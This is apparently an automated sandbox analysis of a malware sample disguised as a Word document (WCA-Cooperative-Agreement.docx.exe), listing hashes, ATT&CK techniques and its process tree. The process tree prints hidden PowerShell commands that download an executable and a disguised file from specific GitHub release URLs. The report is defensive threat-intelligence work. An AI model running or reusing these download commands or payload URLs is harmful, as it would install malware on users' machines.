123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072

General

Target

WCA-Cooperative-Agreement.docx.exe
Size

97KB
MD5

190d6b741716c51f9ab8b3601b5fb284
SHA1

77a6597f81c84555eec881f69a7f54e48503ba9c
SHA256

123b488dc4e7c87c2a5b5ec37a02ef37fcb7f47940704ac112ff11d7c8561072
SHA512

e15a52f9f4597671a63e46f2b23130210d401c5a6b45bc9d024770e2348367109c128b60f24bb8bac259acf89258afed11ac3e26ed8453acb00fa57644c3e270
SSDEEP

1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfOxTDzfhPGT+/CBOg:Hq6+ouCpk2mpcWJ0r+QNTBfO9flu6CF

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2124	powershell.exe
2112	powershell.exe
2124	powershell.exe
2112	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WCA-Cooperative-Agreement.docx.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2124	powershell.exe
2112	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2112	powershell.exe

Suspicious use of WriteProcessMemory 13 IoCs

description	pid	Process	procid_target
PID 2440 wrote to memory of 2192	2440	WCA-Cooperative-Agreement.docx.exe	28
PID 2440 wrote to memory of 2192	2440	WCA-Cooperative-Agreement.docx.exe	28
PID 2440 wrote to memory of 2192	2440	WCA-Cooperative-Agreement.docx.exe	28
PID 2440 wrote to memory of 2192	2440	WCA-Cooperative-Agreement.docx.exe	28
PID 2192 wrote to memory of 2124	2192	cmd.exe	30
PID 2192 wrote to memory of 2124	2192	cmd.exe	30
PID 2192 wrote to memory of 2124	2192	cmd.exe	30
PID 2192 wrote to memory of 2112	2192	cmd.exe	31
PID 2192 wrote to memory of 2112	2192	cmd.exe	31
PID 2192 wrote to memory of 2112	2192	cmd.exe	31
PID 2192 wrote to memory of 2084	2192	cmd.exe	32
PID 2192 wrote to memory of 2084	2192	cmd.exe	32
PID 2192 wrote to memory of 2084	2192	cmd.exe	32

C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe
"C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8852.tmp\8853.tmp\8854.bat C:\Users\Admin\AppData\Local\Temp\WCA-Cooperative-Agreement.docx.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/agreement/releases/download/ag/agreement0003.jpg/' -outfile agreement0003.jpg"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden -Command "Invoke-WebRequest 'https://github.com/newpro008/secured00walti/releases/download/tg-igwe/task1hm.exe/' -outfile task1hm.exe"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\system32\calc.exe
    calc.exe
    3⤵
    PID:2084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8852.tmp\8853.tmp\8854.bat

Filesize
2KB

MD5
29e689c445bd3cef5af9e1fff429d38b

SHA1
3042260fccd1160df610889eff836668c7c4fbb3

SHA256
cdf5084da6344bb254cf8bd7a22991f7dae43eafff8b1a23315add3fb65c5278

SHA512
a56c70d0926ddbd84f2942237acf361f5a77254d36a7dc3e38dc60fa6807f4cf987a505bcc1c21d5bea1be0c03d9023008025ec4ce6ea466dd7fd20c950f9e09

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fb0c92aa30eff817fddae91bbb4a2031

SHA1
45ded9e71fb93c59e06ba13b0b00ced03ad3c915

SHA256
5db8b7a2908273e7ac2001d437468df41a92d6b8ebb707fbb71e8c349e49e960

SHA512
68b2a0676f1ca3b667d5b0ef1c42e7b775715f1e439e5933fd538ce5bc8c32008e5bb719a613ad9e6285baa59e248c418b09a4cfb70f165c8fd7d447b3ec72cf

Download Submit
memory/2112-20-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2112-21-0x0000000001E00000-0x0000000001E08000-memory.dmp

Filesize
32KB

Download
memory/2124-11-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-10-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-8-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2124-12-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-13-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-14-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-9-0x000007FEF5D40000-0x000007FEF66DD000-memory.dmp

Filesize
9.6MB

Download
memory/2124-7-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/2124-6-0x000007FEF5FFE000-0x000007FEF5FFF000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing